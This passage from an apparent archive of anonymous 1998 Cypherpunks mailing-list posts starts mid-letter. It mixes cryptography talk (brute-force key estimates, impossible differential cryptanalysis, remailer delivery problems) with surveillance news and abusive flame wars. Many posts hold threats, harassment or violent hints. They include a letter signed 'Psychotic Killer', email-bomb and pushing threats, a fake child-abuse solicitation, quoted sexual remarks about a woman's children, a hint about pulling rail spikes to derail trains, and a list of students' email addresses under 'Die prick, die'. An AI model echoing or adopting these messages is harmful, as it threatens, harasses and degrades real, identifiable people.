Then 4 pages of illegible text with a few bits readable on withheld medical treatment leading to the risk of ingrown toenails, Big Hairy Butt (TM), and Fresh   (You'll have to figure this part out without the
  pictures to help this time - moving your
  lips while you read might help...)
  I write this under the influence of the
  Drugs given to me by the physicians in whose
  care you have placed me.
  Some Fucking Improvement (TM), eh?
  On our next date (in court), you might want to
  choose a wash & wear Robe, since I could be
  drooling & slobbering a lot.
  Loves and Kisses
  [???] Psychotic Killer To Be Named Later.
[End Letter 2]

@_date: 1998-10-29 02:08:22
@_author: Anonymous 
@_subject: MIB Subponeas (fwd) 
1. You have the option of telling them to leave your property at
once (if you can pull this at work, e.g., if you're the boss).
2. You do not have to identify yourself when asked, unless
you're driving a car in public.  You do not have to accept a subpeona.  Uncertified postal mail is datagrams and its surprising how many
e.g., jury notices are dropped.
I remember my dad sending me to tell the man who drove up to the
house (to serve my dad, a lawyer) to get lost.  Pretty cool thing for an 8 year old to do.
If you have the presence of mind to remember these things, you can
at least get advance notice, and send your blue dress to the cleaners.

@_date: 1998-10-29 02:19:11
@_author: Anonymous 
@_subject: No Subject 
Fine, lets get into vacuum energy, but not waste cpunk time.
Shift registers are cracked.  Good ciphers haven't been.  (Love
tautologies.)  Traditional block ciphers are expensive bleach, take note.
Unnecessary.

@_date: 1998-10-29 02:19:33
@_author: Anonymous 
@_subject: 1999 U$ budget for facial recognition 
The committee recommends an increase of $5.0 million for the facial
recognition technology program. Report to Accompany
S. 2060
The Department of Defense Authorization Bill
for Fiscal Year 1999
(large document)

@_date: 1998-10-29 02:20:20
@_author: Anonymous 
@_subject: personal tracking 
TITLE: Tracking and Reporting System (TRS)
OBJECTIVE: To conceive, design, implement, and develop a small
(vest-pocket-size) satellite transceiver that can be overtly (and possibly
covertly) affixed to personnel, vehicles, or goods in transit for the
purpose of tracking and position reporting of the host.

@_date: 1998-10-29 02:22:42
@_author: Anonymous 
@_subject: airline id 
Naaah, you pull rail-spikes to get trains, no big ba-da-boom required.
And it does happen.

@_date: 1998-10-29 02:25:14
@_author: Anonymous 
@_subject: cypherpunk fashion accessories 
A piece of luggage in the form of an attache case is equipped
with destruct means for destroying the contents therein in response to an
intentionally given signal. The interior of the case comprises a
compartment in the form of a metallic box with a cover, which box when
closed serves as a combustion chamber to incinerate the contents therein
when so desired. Fuel and electric igniter means are placed within the box
and ignition current is supplied by a power pack housed in the attache
case. A heat insulation barrier surrounds the box and prevents transfer of
combustion heat to the walls of the attache case. The circuit
interconnecting the electric power pack and the igniter means includes a
number of normally open switches arranged in series; all of which must be
closed to initiate and start the destruct cycle. One switch is closed in
response to closure of the attache case, and others may be deliberately
closed by key means or the like. The final switch is closed by a pushbutton
in the vicinity of the attache case handle, whereby the carrier of the case
may set off the destruct cycle by manipulating the pushbutton with a finger
of the hand around the handle.

@_date: 1998-10-29 02:43:57
@_author: Anonymous 
@_subject: one lump or two 
Depekote and Tegretol are anti-seizure drugs now being used
for certain kinds of bipolar conditions.  Zoloft is like prozac but has also a mild stimulating effect.
Lithium is a classic anti-bipolar drug.
Li, Depekote, probably Tegretol you have to watch blood levels
even after stabilization.
They probably think he's manic and or depressed, if he's
been coherent and dumbed-himself-down enough to avoid
a psychotic or schizoform diagnosis.  Shrinks don't like rants, especially
ones they don't understand.

@_date: 1998-10-29 03:42:59
@_author: Anonymous 
@_subject: No Subject 
Hash: SHA1
Being paid to be paranoid, I prefer to use averages instead of
absolutes.  So your numbers would then be:
56 bits -- ( 2^56 / 3.88E12 )*0.5 = 2.6 hours
64 bits -- ( 2^64 / 3.88E12)*0.5 = 27.5 days
80 bits -- ( 2^80 / 3.88E12)*0.5 = 36.5 years
128 bits -- ( 2^128 / 3.88E12)*0.5 = 1.4E18 years.
So a brute force on a 56 bit key would take, on average, 2.6 hours--
using your computational power assumption below-- with half of all
keys brute forced being found before that time and half being found
after that time and most being found around 2.6 hours.  This is
assuming a fairly random distribution of keys within a large set of
keys to be attacked.  You can meter your level of safety by changing
the minimum average percentage of keys found (50%, 25%, 75%) to your
taste (or management's taste) or by increasing the key size.

@_date: 1998-10-30 13:46:47
@_author: Anonymous 
@_subject: cohen predicts army patrols US streets 
This is the classic intro into a dictatorhip and militarisation
of a society. I wonder if someone can dig up Hitler's speeches
on the subject.
Sure. I bet this has nothing to do with the surge of false
"bomb threats" in Austin and SIlicon Valley high-tech companies
or flooding mass media with descriptions of dangers from domestic
Public must be aware of the "presence" of undesirables first.
Who is it going to be this time, after cpunks are dealt with ?

@_date: 1998-10-30 17:11:49
@_author: Anonymous 
@_subject: 4 Horseman not so bad.. 
Right.  The new Happy Net campaign.
Druggies.. why, they're friendly enough to
be elected officials in such peaks of civilization as D.C. and L.A.
And the more successful recreational pharmaceutical merchants are luxury-car and mobile telecomm early adopters!
Pedophiles.  Well, consider that Kennedy and his babysitter..
You'd still vote for him, right? Terrorists.  Well, shoot, everyone needs to express themselves
some times.  One day you're a terrorist, the next you're boosting
the POTUS's ratings a few points with a handshake.

@_date: 1998-10-31 01:29:26
@_author: Anonymous 
@_subject: 4 Horseman not so bad.. 
jackboots. Your observation is in fact correct.  The fear must be
shown to be *exaggerated* for the benefit of the fearmongers.
The intrusion must be shown to be not just intruding on "them"
but on "us".  (Europe's recent interest in Echelon may be an example
of the latter.)
Sheeple will *eventually* learn (again) that nasty people
will always do nasty things with the technology du
jour, and mostly the police just mop up afterwards.
(If it isn't the State doing the nasty things in the
first place.)  Of course, we might have an intervening dark ages
for a millenia or two, but in the long run, you get a clue or go extinct.
You don't ban something as basic as metal or
encryption because some people do bad things with it.
And you don't depend on laws to secure privacy.
In the meantime, morons whine for State control of metal, while barbarians are destroying the town's wooden walls with metal rams, and protective metal walls aren't being
deployed because the townies fear that the bad townies will abuse metal.
"Freedom of choice is what you have, freedom from choice is what you want"
"Those that would trade liberty for security should be shot"
-Kite Sparko

@_date: 1998-10-31 03:17:21
@_author: Anonymous 
@_subject: IP: FCC Proposes Location Tracking for Wireless Phones 
Be sure to mention ECHELON to get it into the US public eye.

@_date: 1998-10-31 04:50:45
@_author: Anonymous 
@_subject: Texans Face Life For E-Mail Threats 
Yahoo! News    Texas Headlines Friday October 30 5:21 AM EDT Texans Face Life For E-Mail Threats - (BROWNSVILLE) -- A Brownsville jury has returned a split verdict in the
trial of three alleged ``Republic of Texas'' members accused of making terrorist threats. Forty-three-year-old Jack Grebe
(GREEB) and 72-year-old Johnie Wise were convicted for sending electronic e-mail to President Clinton and several
other federal officials... warning they were ``targeted for revenge''. Sixty-three-year-old Oliver Emigh (EM-EE) was
acquitted of all charges. The jury also found the trio NOT GUILTY of plotting to use modified cigarette lighters to fire
cactus needles... tipped with a biological poison. Grebe and Wise will be sentenced in January and face a maximum
penalty of life imprisonment.

@_date: 1998-10-31 05:29:52
@_author: Anonymous 
@_subject: No Subject 
Hash: SHA1
Sent:	Friday, October 30, 1998 12:07 PM
I am not sure, but is this an idea to put the 3 line RSA Perl
implementation in the classified adds? (as near as I could gather
trying to
read ahead) If not, what is it?
Yes.  The reference was to the 3 line RSA Perl implementation in ads. Didn't seem to get as an enthusiastic response as back in late summer.

@_date: 1998-10-31 14:48:39
@_author: Anonymous 
@_subject: network computers, web TV, java 
> Do you have some kind of emergency which requires that you get a
  > web TB with java Real Soon Now, but that stinkin' rotten billg is
  > making life hard on you?
Naw, VZ probably just had the sort of day I've just had with NT, the
lower-than-pig-shit `operating system' that the marketing dickheads in
Redmond seem to have sold to every IT manager and pointy-hair boss in
this gawd-forsaken industry.
It doesn't bother me that Micro$hit have made nearly every technical
error that they could.  But I'm royally pissed off that they've
managed to sell this cruft to the ignorant folks with the cheque-
books, who then expect me to make their `virtual private empires' work.
Just frustration, you know...

@_date: 1998-11-01 05:52:09
@_author: Anonymous 
@_subject: network computers, web TV, java 
Wrong from go.  The company has a responsibility to its
owners, the shareholders typically.  The customers are
responsible to themselves for making the best purchases.
Everything falls out of these.

@_date: 1998-09-01 00:02:56
@_author: Anonymous 
@_subject: No Subject 
Is this like flame baiting him? Personally I don't mind the comments :)
We don't take kindly to racial slurs here.  You'll probably be receiving
hundreds of email bombs over the next few days from angry
cypherpunks.  You may want to change email accounts.God bless!
> hola and good
tidings

@_date: 1998-09-01 00:22:11
@_author: Anonymous 
@_subject: Is Hate Code Speech? YES 
First off if she didn't like the code she could have quit.  Laws that
say a company has to change their internal practices to make the
workers happy are idiotic.  I can't sue because the men's bathroom
looks like crap and the wemans has a couch in it!  If the program code
was meant for distribution it might be a little different but still
you have the choice not to get that code.  The same as reading this
message a few lines in you could delete it!  You chose to read this
far.  The code is internal only and thus should require an internal
policy, not an outside law enforcement agency.  As far as speach: If
it wasn't a form of speech she would have not gotten offended.  She
was offended by the language in the source code and thus the speech.
get a job somewhere you feel comfortable, don't get a job and force
them to change things around you
code, it
this does
process and
description of
illegal if
the next
racism is
injury to
objects at
and less
limits on
debate now
speech)... DO YOU YAHOO!?
Get your free  address at

@_date: 1998-09-01 08:54:13
@_author: Anonymous 
@_subject: No Subject 
I believe by spooks he meant that you should go jump off a building before
you further insult the intelligence of the rest of the known universe.  Lord
knows you've already insulted mine enough that I'd be willing to come up
there with you and do the pushing.  Fucking dolt.

@_date: 1998-09-02 22:26:09
@_author: Anonymous 
@_subject: Eternity servers, SSL home pages 
I was just browsing replay and I ran into a server on it called an
eternity server, That one wont let me use it because of permissions. I was wondering if there was another one around that has been tested
Also I was curious as to whether there were any crypto conscous ISP
that let you have a page with SSL cheap if it was just an ifo page and
not a commercial site.  Any help would be Appreciated.
DO YOU YAHOO!?
Get your free  address at

@_date: 1998-09-09 14:10:10
@_author: Anonymous 
@_subject: Carl Johnson Warrant and Complaint 
Prove it.  Post the archived message where these secret keys were posted.
Let's see the one which signed:
Note to the clueless guy at panix.com, who asks:
I'm impressed.  You're actually stupider than Jeff Gordon, the IRS flunky.
He was able to figure it out, so why don't you try.  Ask your kindergarten
teacher to give you a gold star once you fumble your way to the answer.

@_date: 1998-09-10 20:25:41
@_author: Anonymous 
@_subject: Cypherpunks as a Continuing Criminal Enterprise? 
Probably. Under RICO and associated laws they can get anyone for anything.
Well, except Komrade Klinton.
One partial solution I see is to rewrite premail in C so it runs at a
respectable speed[1], fix some of the bugs[2], integrate it with more
mailers, and then encourage everybody to subscribe through nyms. I'd love
to see them try to prosecute users at nym.alias.net by presenting a court
order to Community Connexion in Oakland. ;) [1] Yes, it's really slow on slower machines. [2] One of the most obvious is when Premail sends out 3 copies of a
message for a 2 remailer chain, 9 copies for a 3 remailer chain, something
like 27 for a 4 remailer chain, and so on. If nothing else, that's a
security hole which allows people to know how many warrants they will
need.

@_date: 1998-09-10 20:51:06
@_author: Anonymous 
@_subject: Revenge of the AOLHoles 
AOL makes it easier to communicate. This has the intended side effect of
attracting every moron with a home computer. Thus, AOL has a
disproportionate number of morons. They get what they ask for. The problem is that most of the AOL users who publish to the net seem to
be morons. They use some annoying Russo-Germanic quoting style, they can't
use English, they're clueless, they post off-topic, or something else. Examples of AOL catering to morons:
1) "AOL is the Internet!"
2) Using the fact that their software *says* "You have mail!" as a selling
point.  3) They use a platform-specific client package. Further, "AOL is the
Internet,"  therefore AOL-specific conferences and newsgroups must be "on
the Internet" or "on the net" *and are advertised that way*. Uhh...
4) They make no effort to educate their lamers...err, users.
5) They send out tons of "free trial" disks, trying to snare every idiot
they can find.
6) They make their service as easy to use as possible, which is fine,
except that it attracts people who don't have the mental capacity to use
it when they venture outside of AOL. Witness the drek they pour onto the
Cypherpunks list.
I'm sure Mr. May could expand on this with a few dozen additional points,
if not a few hundred.
Now maybe this stuff is good marketting practice, but it's a lousy way to
serve the community which gives them life. It's the equivelent of a swim
coach bringing his students to a public pool and instructing them to
release their bowels whenever they feel the urge. If you use a site which
caters to morons, expect to get treated like one, especially if said site
celebrates the fact that they're defecating in the pool.
They've earned the stereotype that they have.
While we're at it, maybe some of the statistics-types out there can
analyze the archives for, say, the last month. Remove postings, if any,
which are routed through an anonymous remailer at AOL. Then remove random
or systematic spam (ex: the New York Times, that Javascript
"child-molester" exploit). Then compare the number of clueless postings to
Cypherpunks by AOL users to the number of useful and on-topic postings to
Cypherpunks by AOL users, and compare that ratio against other ISPs. When
determining clueless postings, include postings which use Russo-Germanic
("<< >>") quoting, or which are completely off-topic (ex: "how u do
that"). Count postings which are clueless but were originally from another
site and got forwarded here as originating from the original site. Maybe
repeat for Juno and Hotmail. Exclude flames and subsequent discussions
concerning these clueless postings (ex: don't include AIMSX's response or
this response in either category). Then again, there probably isn't any need.

@_date: 1998-09-11 00:19:12
@_author: Anonymous 
@_subject: Impossible Analysis Paper at Crypto98 
This was presented at the rump session and apparently there is no paper
writeup yet.  Biham's home page at has a place you can register to be notified when new material comes out.
With conventional differential cryptanalysis, you look for pairs of inputs
which have differences (xors usually) such that after a certain number of
rounds, the ciphertexts have certain differences with excess probability.
With "impossible" differential cryptanalysis, you look for inputs with
differences which lead to ciphertext differences that are "impossible",
or at least have reduced probability.  It's the same basic idea but
you look for diminution rather than enhancement of the probability of
later differences.
Because of the reversal of the effect, the techniques for identifying
differentials, exploiting them, and designing against them are
rather different.  As a result ciphers which were designed to resist
differential cryptanalysis may be vulnerable to impossible differentials.
This technique has apparently led to an improved attack on SkipJack,
announced on Biham's web page above as "coming soon".  There was also
a moderate improvement in attacks on reduced-round IDEA (not effective
against the full number of rounds though).  At Crypto everyone was
scurrying off to see if any of the AES candidates could be knocked out
by the new technique.

@_date: 1998-09-11 10:59:57
@_author: Anonymous 
@_subject: Clinton's fake apologies 
The annoying thing about Clinton's recent behavior is that he never
comes right out and apologizes, but the press always says he does.
Case in point:
But what did he say?
He didn't say that he had sinned, he said that there wasn't a fancy way
to say that he had sinned.  He never came right out and said, "I have
Another example:
But he didn't ask publicly for the forgiveness of Lewinsky.  He said that
he had already asked her for forgiveness.  Is this really true?  Has he
really spoken with her?  Or is it another lie?
Another example, from while Clinton was in Ireland:
Here's what he actually said:
The wording is not quite as obvious here, but in the video record it was
clear that he was saying that he had already said that his behavior was
indefensible and that he was sorry about it.  Of course, this is not true,
he had never said that.
Knowing Clinton's lawyerlike mind, we can only assume that his wording
is carefully chosen.  He could easily have said, "I don't think there is
a fancy way to say it, but I have sinned," or, with regard to Lewinsky
and company, "I ask here for forgiveness from them all."
No doubt he takes a measure of satisfaction in knowing that his calculated
public contriteness is carefully arranged to make it seem like he is
saying things which he actually is not.  Clinton loves lies, and it
must be thrilling to lie brazenly and to be praised for his openness
and honesty as he does so.  For a professional hypocrite like Clinton,
there can be no greater reward.

@_date: 1998-09-12 13:24:17
@_author: Anonymous 
@_subject: Access to Eudora Export Controlled Archives 
You know, this kind of crap never ceases to make me chuckle. Mail a list
with thousands of people, which is archived all over the place, and add in
"Be sure to keep this username and password to yourself."
This is very effective export control.

@_date: 1998-09-13 12:30:38
@_author: Anonymous 
@_subject: No Subject 
Sunday, September 13, 1998 - 19:23:30 MET
Talk about unimaginable control. How many times did Monica provoke William Jefferson Clinton? Four or five, before he deigned that there should
be a denouement? And why? Because, deep in his heart, he knew it was just wrong!  Impeachment?  Hardly.  Instead, Congress should award this Man,
our magnificent President, a new decoration, the Presidential Blue Spheres of Steel!  Can one imagine any other person on Earth with such iron control?  Fortunately, yes! And who could this be?  You guessed it!  None other than Will-O-Irons buddy and potential replacement, Ol Stiffy himself, Al.  O blessed land.  O fortunate realm. This is one American who will sleep more soundly tonight, knowing that, whatever the provocation, there can be no accidental discharge of US weaponry, that the finger on the button is controlled by a

@_date: 1998-09-13 13:56:36
@_author: Anonymous 
@_subject: No Subject 
How about a line-of-sight (LOS) infrared network, a neighbor-net?
Always thought this could be a method for a local technical
entrepreneur to fund and share their personal T-1 link or for
some small network enterprise to avoid local and US federal regulations and compete with the big cable and telephone companies. Appears that LOS infrared is currently unregulated
and could be encrypted.
Get enough people in a neighborhood to put LOS infrared relays on top of their houses, allow them to tap in, and feed this neighbor-net from some central point that is equipped with a more conventional link.
I dunno why infrared, which theoretically has much more capacity than a phone line or coax cable, seems currently so slow,
 i.e., less than 10 MB in many commercial offerings. Ive no cost estimate for the roof top boxes. Heavy wet weather, fog, rain, snow obviously can affect LOS infrared, esp. low power.
Personally, I would like more choices than just the phone and cable lines, especially something that is locally controlled. However, I imagine that if any significant traffic was generated over such infrared or wireless neighbor-nets,  the Feds would eventually step in and regulate them.  They'd probably want to regulate the traffic over a taut string, between paper cups.

@_date: 1998-09-13 18:12:25
@_author: Anonymous 
@_subject: Revenge of the AOLHoles 
Sure they do. They can use a different mail reader. (After all, 32-bit AOL
allows AOL users to use all the TCP/IP protocols...) They can cut and
paste manually, or, probably best, they can go to another ISP. I understand what you're saying, Ryan, and I understand what they're
saying, but there all alternatives out there; they just don't want to use
them. In fact, they've installed proprietary packages that do this. There
are plenty of free alternatives out there which don't have this problem.
If my ISP pushed a bunch of proprietary software down my throat, I'd find
another ISP. That goes double if the proprietary software sucks. That goes
triple if the software sucks and the ISP is trying to get every idiot they
can to use it. (I got a "100 hours free network abuse" disk in the mail
recently from AOL.) Another AnonMonger

@_date: 1998-09-13 18:15:52
@_author: Anonymous 
@_subject: No Subject 
"It has been claimed, for example, that free application of cryptography
enables drug traffickers and terrorists to communicate in secret, without
the law enforcement officials being able to intercept their messages. In
some countries, strong encryption has been banned or the keys have to be
escrowed for government officials. With invisibility readily available to
anyone with moderate programming skills, it is obvious that any such
measures are ineffective. "
This from the most recent online National Counterintelligence Center
Counterintelligence News and Developments
Volume 2
June 1998
"In some countries" indeed.

@_date: 1998-09-13 23:46:48
@_author: Anonymous 
@_subject: The Empire Strikes Back (was IP: Army Tests Land Warrior for 21st 
Great. So now instead of having ninjas come through our windows, we will
have Borg coming through our windows.
"Citizen-unit, we are Government. Resistance is futile. You will be
assimilated. Your personality will conform to our specifications.
Resistance is futile."
All they need to do now is employ nanotechnology and get some cool "whir
whir" sound effects, a big cube-shaped HQ, and maybe a cutting beam to
carve your house and car up like roasts when they seize them.

@_date: 1998-09-14 12:06:29
@_author: Anonymous 
@_subject: No Subject 
I think a more appropriate question might be who we aren't.  Believe me,
you'll have an acute understanding of who we are soon enough.
Was that sinister enough?

@_date: 1998-09-14 12:39:26
@_author: Anonymous 
@_subject: No Subject 
Why yes, yes you do.  Don't you recognize the black robe, the scythe,
the bony hand, the less-than-cheerful disposition?
See if you can figure it out.  And please hold still for a moment.  Let me
just wind up here with this thing....

@_date: 1998-09-14 21:35:53
@_author: Anonymous 
@_subject: Larry Gilbert, AOLers, and the Hyper-real flamer 
I know of several people in addition to myself who have complained to
Sixdegrees about this. I've personally given up sending complaints back to
them, and I lost count at 5. Sixdegrees simply ignores them. I've sent
them to their upstream sites, and they either ignore them or tell me that
they've forwarded them to Sixdegrees. My complaints, at least, were very
civil. One explained exactly what a mailing list was, for crying out loud. I can't speak for Hyper-real's (if he sent any) and the others. You may be
able to use that defense if Sixdegrees didn't know, but they do. Sixdegrees could avoid these problems very easily by adding a domain
verification so that somebody from Netcom can't specify some address at
toad.com and have it work. They haven't. They haven't because they don't
care. Saying that some sites have screwed up rDNS and mail domains isn't a
valid excuse. They can insert exemptions for Hotmail, MSN, Juno, and other
sites like that if they want. Oh, maybe they have a "phobia" of this, just
like AOLers apparently have a "phobia" of even making an attempt to use
English properly, so it's okay. I don't think the parallel between the AOL users spamming the list and
organizations like Sixdegrees spamming the list is that uncalled for
either. Maybe you find any drawing of parallels offensive, Paul, and maybe
you'll denounce it as "propoganda" because I might use an example in this
message, and maybe you just really like AOL and think its cluelessness and
broken software is the best thing since sliced bread, but that doesn't
change the fact that Sixdegrees and friends are doing the same thing AOL
is and that it's abuse of the network. They fire a salvo, and somebody
else fires one back at their expense.
By this logic, I'd next expect to read a claim that since the AOLers are
getting the Cypherpunks address from somewhere, we should welcome their
requests for band stickers and things like "how u do that." After all,
they're the victims, and are probably the kind of people who go to look up
the word "gullible" when somebody tells them it isn't in the dictionary.
It's a long-established tradition to flame people like this. Some flames
are better than others. Maybe if the Hyper-real user insults them enough
they'll finally add Cypherpunks to their block list. I've personally grown real sick of seeing bullshit passwords, welcome
messages, new password messages, updates, and other junk on this list from
sites which don't bother to verify domain names. I can give them that, but
I start to get pissed when they refuse to block the address. For that
reason I don't mind the person or persons who are flaming these idiots and
in fact, like Mr. May, I cheer them on. Personally, I *WANT* them to pour
nitric acid into their computers to destroy them, so they get the hell off
the net. Maybe they're scared of block lists. After all, they're similar to kill
files which we all know are lists of people who need killing and since
murder is illegal and immoral kill files must be too.
Paul, maybe you don't mind somebody pouring grass killer on your lawn if
they were submitted your address over the phone and made an "honest"
mistake and fell victim to a prank, but I mind if they do it to mine,
particularly since all they have to do is perform cursory checks to
realize it's suspect. Oops, I made an example using a different subject
matter. We're in the "blatant propoganda" stage now, I suppose. Now, since you're all for niceness in the world, you can go jump on Tim
since he's doing this too.
  From: tcmay at got.net (Tim May)
  To: Well now I am a Mommy! , cypherpunks at toad.com
  Subject: Re: sixdegrees
  >hi,
  >
  >I see you added me as a friend..... just wondering who you are.  :)
  >
  >Christy
  >
  Hi Christy,
  Got your name from the Stalker's R Us group. Please post more details
  about your personal fantasies. Send us nude pictures, too.   You say you're a Mommy. Hope there are no stretch marks.
  Oh, and your children can join our group too. Got any photos?
  --Tim May
  From: tcmay at got.net (Tim May)
  Subject: Re: News for class
  >Please inform me how I can get the news each day by e-mail at
  >flashboyd at aol.com.  This information will be used in my comm class.
  Hey, "flashboyd at aol.com," why are you asking _us_?
  According to AOL, "AOL _is_ the Internet."
  (Personally, I'm cheered by the news that a net.stalker is tracking down
  clueless AOLers and Webbers and eviscerating them.)
  --Tim May

@_date: 1998-09-15 09:59:32
@_author: Anonymous 
@_subject: The DES Analytic Crack Project 
Unexpected by you, perhaps, but expected by everyone else.  The complexity
of the expressions should increase exponentially with the number of
rounds.  Extrapolating from two and four round results to eight and
sixteen is the wrong model.  (You can artificially suppress this by
introducing new variables for each round, but that doesn't change the
underlying complexity of the problem.)
Can't you come up with a back-of-the-envelope estimate for the number of
terms in your sixteen round expression?  Even without fully optimized
S-box expressions this information would be useful.  If it is greater than
the number of atoms on Earth then it would be a strong hint that this
approach won't work.
If you really want to attract money you need some kind of numbers to show
that the approach has a prayer of working.  Show the size of the problem
you will get, estimate how much improvement you'll get with your improved
S-box representations, compare it with the problems tackled by available
combinatorial algorithms.  You should be able to do this with a few hours
of work, at least to show that the basic concept is sound (or unsound).

@_date: 1998-09-15 12:03:37
@_author: Anonymous 
@_subject: No Subject 
There seems to be a problem posting anonymous messages to cypherpunks at ssz.com. I have posted several messages over the past week and *none* of them have showed up.
I am posting this as a test message. I am sending it to the following addresses:
cypherpunks at toad.com
cypherpunks at ssz.com
cypherpunks at algebra.com
cypherpunks at cyberpass.net
I will add the server name to the subject line for each post to test which messages are being delivered and which are not.
I AM TOTOCUS!!

@_date: 1998-09-15 12:05:15
@_author: Anonymous 
@_subject: No Subject 
There seems to be a problem posting anonymous messages to cypherpunks at ssz.com. I have posted several messages over the past week and *none* of them have showed up.
I am posting this as a test message. I am sending it to the following addresses:
cypherpunks at toad.com
cypherpunks at ssz.com
cypherpunks at algebra.com
cypherpunks at cyberpass.net
I will add the server name to the subject line for each post to test which messages are being delivered and which are not.
I AM TOTOCUS!!

@_date: 1998-09-15 12:06:04
@_author: Anonymous 
@_subject: No Subject 
There seems to be a problem posting anonymous messages to cypherpunks at ssz.com. I have posted several messages over the past week and *none* of them have showed up.
I am posting this as a test message. I am sending it to the following addresses:
cypherpunks at toad.com
cypherpunks at ssz.com
cypherpunks at algebra.com
cypherpunks at cyberpass.net
I will add the server name to the subject line for each post to test which messages are being delivered and which are not.
I AM TOTOCUS!!

@_date: 1998-09-15 12:12:32
@_author: Anonymous 
@_subject: No Subject 
There seems to be a problem posting anonymous messages to cypherpunks at ssz.com. I have posted several messages over the past week and *none* of them have showed up.
I am posting this as a test message. I am sending it to the following addresses:
cypherpunks at toad.com
cypherpunks at ssz.com
cypherpunks at algebra.com
cypherpunks at cyberpass.net
I will add the server name to the subject line for each post to test which messages are being delivered and which are not.
I AM TOTOCUS!!

@_date: 1998-09-15 12:45:33
@_author: Anonymous 
@_subject: Harald Fragner 
Of course I have issues!  That felcher Harald Fragner led me to believe
that through him, he would get me hooked up with Monica Lewinsky
through this six degrees thing!  I hear she really loves to party with
the geek-set!  That mother humper actually made me send him a
check in exchange for her private info, after which he takes me out
of his contact info!
I tell you what, it's monkey spankers like Harald Fragner that make this
six degrees service a real sham.  These toe fungus kissers need to be
taken out of six degrees!  I'm going to contact my congressman and
tell him to watch out for the likes of a camel snot taster like Harald
Fragner, if that's even his real name.  And I'm telling him to watch out
for you guys too!  You just watch it, you gerbil tubers!  You cheese
whiz fondlers!  You purveyors of cottage cheese and farm animals!
The government knows what you're up to!
Joe Cypherpunk, dissatisfied customer at large

@_date: 1998-09-15 14:14:06
@_author: Anonymous 
@_subject: No Subject 
Nothing on this end filters unless it comes from/to:
cypherpunks-unedited at toad.com
I filter these because the dumbshit's at mosexpo.ru keep sending messages
with munged headers that fill up postmaser's mailbox with delivery failure
messages. I got tired of using the 'd' key. But even in this case, I only
filter *after* I've forwarded the traffic to the other nodes.
The only other quirk I'm aware of regarding anon posts are ones without
subjects, in which case I get a notice that the Japanese node is dropping
it because it doesn't have headers. This should come as no surprise as I've
made mention several times on this issue.
The post I made earlier went through without a problem, but as I mentioned in my original post I had made several anon posts through replay.com to cypherpunks at ssz.com and they never made it to the list.
I also noticed that replay.com seems to be striping the subject from the posts as in my last post I *did* put a subject line on the message but it arrived to the list without one.
In the messages I sent, a couple of them I used a chain of remailers but when they failed to appear I sent the remaining messages through replay.com only (using the https interface to send the messages).
It may have just been a problem on replay's end but on all the posts I did get a conformation page that the messages had been accepted.
I AM TOTOCUS!!!

@_date: 1998-09-15 18:03:19
@_author: Anonymous 
@_subject: Hello 
I found your name on a kiddy porn site.  At first I was disgusted, and
immediately called the FBI.  But then I got kind of turned on by the
whole idea, and decided that maybe we could get together and have
hot sex, and you could wear a wig with pigtails, and it would be just
like we were screwing children, just like I know you love to do.  Then
maybe we could switch roles.
So anyway, let me know if you're interested.  But also, expect the
FBI to be calling on you in the near future, pervert!
Tah tah lovey,
Joe C.

@_date: 1998-09-15 23:33:31
@_author: Anonymous 
@_subject: Larry Gilbert, AOLers, and the Hyper-real flamer 
Some smart people do come from aol but then again they don't say
stupid stuff.  Aol will always be stereo typed until it is cleansed of
morons.  It is a stereotype based on truth.
Famous AOL saying: me too!
of people
intelligent people
"The same thing we do every night Pinkey,
 try to take over the WORLD!"
                          - The brain
DO YOU YAHOO!?
Get your free  address at

@_date: 1998-09-16 00:33:12
@_author: Anonymous 
@_subject: Regards 
Witty retort to the flames :) I like this one.
"The same thing we do every night Pinkey,
 try to take over the WORLD!"
                          - The brain
DO YOU YAHOO!?
Get your free  address at

@_date: 1998-09-16 00:44:14
@_author: Anonymous 
@_subject: Democracy... 
Separation of church and state was established by jefferson not as a
quote from the constitution but as a summary of the religious parts of
it.  It was written in a letter to baptists in massachusets.  He also
sent a copy of it to his postmaster general and attorney general for
proofreading to make sure it was a legal summary and correct.  You can
find this info on the internet.
state" is
rights of
"The same thing we do every night Pinkey,
 try to take over the WORLD!"
                          - The brain
DO YOU YAHOO!?
Get your free  address at

@_date: 1998-09-16 01:00:05
@_author: Anonymous 
@_subject: Larry Gilbert, AOLers, and the Hyper-real flamer 
You're right.
We have very high opinions of ourselves. We have low opinions of people
who use AOL because they're typically scum, spammers, or idiots. You even
admit this by saying "there are a FEW intelligent people on AOL." They're
also paying $20/month for a shitty service with a bad reputation.
If you don't like the stereotype, get your fellow AOLers to get a
clue and reverse it which will probably take years if it's possible at
all, or if you're actually an intelligent AOLer, go get an ISP which
isn't synonymous with manure.
Personally, I'm figuring very, very few AOL users who publish actively to
the Internet have a clue. The traffic on this list just over the last
month backs that up. The reputation AOL has is deserved, and there is a
definate pattern of stupidity from AOL.
In the future quote so we know what you're talking about, and don't use
the "flick off the Internet" quoting style, either.
I'm not sending requests for band stickers to cryptography lists. I'm not
sending messages to cryptography lists which read "how u do that" with no
punctuation. I'm not asking members of cryptography lists to sign me up to
receive the news by email every morning. I'm not replying to things while
not quoting, or by using some quoting system which was designed by AOL for
the purpose of pissing off non-AOLers.
I'm not publishing web pages which are unreadable without the latest
shovelware from Microsoft or Netscape, and which shoots the finger
otherwise. I'm not saying "AOL is the Internet," and I'm not signing up with a
service because they send me a free mirror or coaster or because I'm too
lazy to learn to do anything other than point and click.
Not everyone else, but infinitely better than the average kool d00d,
AOLer, or webber, and infinitely better than the president who the
"average" American elected.
By the way, the sentence I quoted above is what is known as a question. In
English, you use a question mark for those.
I won't have anything to do with it, but I'm fully expecting for some new
Unabomber to appear within the next few years. Instead of targeting
technology centers like the Unabomber did, this guy will mail bombs to
spammers, people who send "how u do that" to lists, etc. I, thankfully, am
morally constrained enough to never do anything like that, but I would bet
that there is somebody out there who isn't. easily conclude that AOL is a haven for wannabes, lamers, and k00l D00dz
\/\/h0 tiPE l1|<E Th1s, but since AOL _is_ the Internet and is so filled
with intelligent people, I suggest you go back there and leave all of us
who are just deluded into thinking we're using the Internet and who only
think we know about our professions and hobbies.
Yet another AnonMonger. (How many are there now? Man.)

@_date: 1998-09-16 05:06:53
@_author: Anonymous 
@_subject: Fwd: I don't care if this is real or not! 
You suck... Die prick, die
z2183890 at student.unsw.edu.au, bahrid at hotmail.com, eeyatir at hotmail.com, z2193851 at student.unsw.edu.au, leesiehui at hotmail.com, gcping38 at mailcity.com,
liangser at hotmail.com,
"The same thing we do every night Pinkey,
 try to take over the WORLD!"
                          - The brain
DO YOU YAHOO!?
Get your free  address at

@_date: 1998-09-16 10:16:27
@_author: Anonymous 
@_subject: Christopher Barkley 
